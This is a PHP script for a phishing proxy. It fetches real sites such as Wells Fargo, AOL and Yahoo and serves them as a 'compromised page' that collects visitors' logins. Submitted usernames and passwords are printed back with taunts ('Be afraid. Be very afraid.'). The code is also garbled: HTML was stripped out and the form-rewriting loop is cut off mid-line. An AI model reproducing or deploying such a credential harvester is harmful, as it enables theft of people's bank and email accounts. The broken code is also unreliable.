will work
$dest[]="Slashdot";
$link[]="http://www.slashdot.org";
$dest[]="Kuro5hin";
$link[]="http://www.kuro5hin.org";
$dest[]="Yahoo!";
$link[]="http://my.yahoo.com";
$dest[]="America On-Line";
$link[]="http://www.aol.com";
$dest[]="NetZero";
$link[]="http://webmail.netzero.net";
$dest[]="Wells Fargo Bank";
$link[]="http://www.wellsfargo.com";
$dest[]="Neverwinter Nights";
$link[]="http://nwn.bioware.com";
# has somebody submitted our form?
if (isset($the_site_you_really_wanted))
{
print "
\n";
print "Be afraid. Be very afraid.\n";
print "
\n";
print "You just gave me your login and password for the following Web site:\n";
print "
\n";
print "
\n";
foreach ($_POST as $k => $v)
{
print "
$k: $v
\n";
}
foreach ($_GET as $k => $v)
{
print "
$k: $v
\n";
}
print "
\n";
print "Have a nice day!\n";
print "\n";
exit;
}
# if one of our links was not submitted, print the list of links
if (!isset($p))
{
print "\n";
print "Useful Links\n";
print "
\n";
print "\n";
}
else
{
# here we go ... some eager sucker has followed one of our links
# first, parse the URL in case we need to supply a base href later
$url = parse_url($p);
$base_href = $url[scheme] . "://" . $url[host] . "/";
# go grab the page
$handle = fopen ($p, "r");
$contents = "";
do {
$chunk = fread($handle, 8192);
if (strlen($chunk) == 0) {
break;
}
$contents .= $chunk;
} while(true);
fclose ($handle);
# stick it all in $data
$data = explode("\n", $contents);
# go through $data line by line
for ($i=0; $i";
}
# dump the compromised page to the client's browser
foreach ($data as $line)
{
print "$line";
print "\n";
if (stristr($line, "\n";
}
}
}
?>